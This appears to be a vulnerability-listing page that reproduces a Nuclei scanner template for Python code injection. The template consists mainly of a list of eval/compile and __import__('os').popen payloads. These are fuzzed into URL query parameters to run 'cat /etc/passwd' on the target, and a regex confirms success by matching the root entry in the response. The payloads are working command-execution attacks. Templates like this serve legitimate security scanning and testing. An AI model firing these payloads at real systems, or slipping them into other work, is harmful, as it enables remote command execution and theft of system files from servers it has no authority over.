python-code-injection: Python Code Injection

Date: 2025-08-01 | Affected software: python code injection | PoC: public

Vulnerability description

PoC code [public]

id: python-code-injection

info:
  name: Python Code Injection
  author: ritikchaddha
  severity: high
  tags: python,dast,injection,cmdi,vuln

variables:
  Command: "cat /etc/passwd"

http:
  - pre-condition:
      - type: dsl
        dsl:
          - 'method == "GET"'

    payloads:
      injection:
        - eval(compile("""for x in range(1):\\n import os\\n os.popen(r'{{Command}}').read()""",'','single'))
        # without loop, one expression
        - eval(compile("""__import__('os').popen(r'{{Command}}').read()""",'','single'))
        # without loop, one expression
        - eval(compile("""__import__('subprocess').check_output(r'{{Command}}',shell=True)""",'','single'))
        # without compile
        - __import__('os').popen('{{Command}}').read()
        # multiple expressions, separated by commas
        - str("-"*50),__import__('os').popen('{{Command}}').read()
        # multiple statements, separated by semicolons
        - eval(compile("""__import__('os').popen(r'{{Command}}').read();import time;time.sleep(2)""",'','single'))
        - eval(compile("""__import__('subprocess').check_output(r'{{Command}}',shell=True);import time;time.sleep(2)""",'','single'))
        # with `for` loop technique, without global __import__ using subprocess.popen
        - eval(compile("""for x in range(1):\n import os\n os.popen(r'{{Command}}').read()""",'','single'))
        - eval(compile("""for x in range(1):\n import subprocess\n subprocess.Popen(r'{{Command}}',shell=True, stdout=subprocess.PIPE).stdout.read()""",'','single'))
        - eval(compile("""for x in range(1):\n import subprocess\n subprocess.check_output(r'{{Command}}',shell=True)""",'','single'))

    fuzzing:
      - part: query
        type: replace
        fuzz:
          - "{{injection}}"

    stop-at-first-match: true
    matchers:
      - type: regex
        part: body
        regex:
          - 'root:.*:0:0:'
# digest: 4b0a00483046022100d20dead9d43184682b9162961ee82df8d0c89d9dcb2b219668c1f607b37c6a6f022100cddb28a5648ce05e0666ef2b25997ab11ea7c2dde5d78d7bb8245fb67e73ec39:922c64590222798bb761d5b6d8e72950
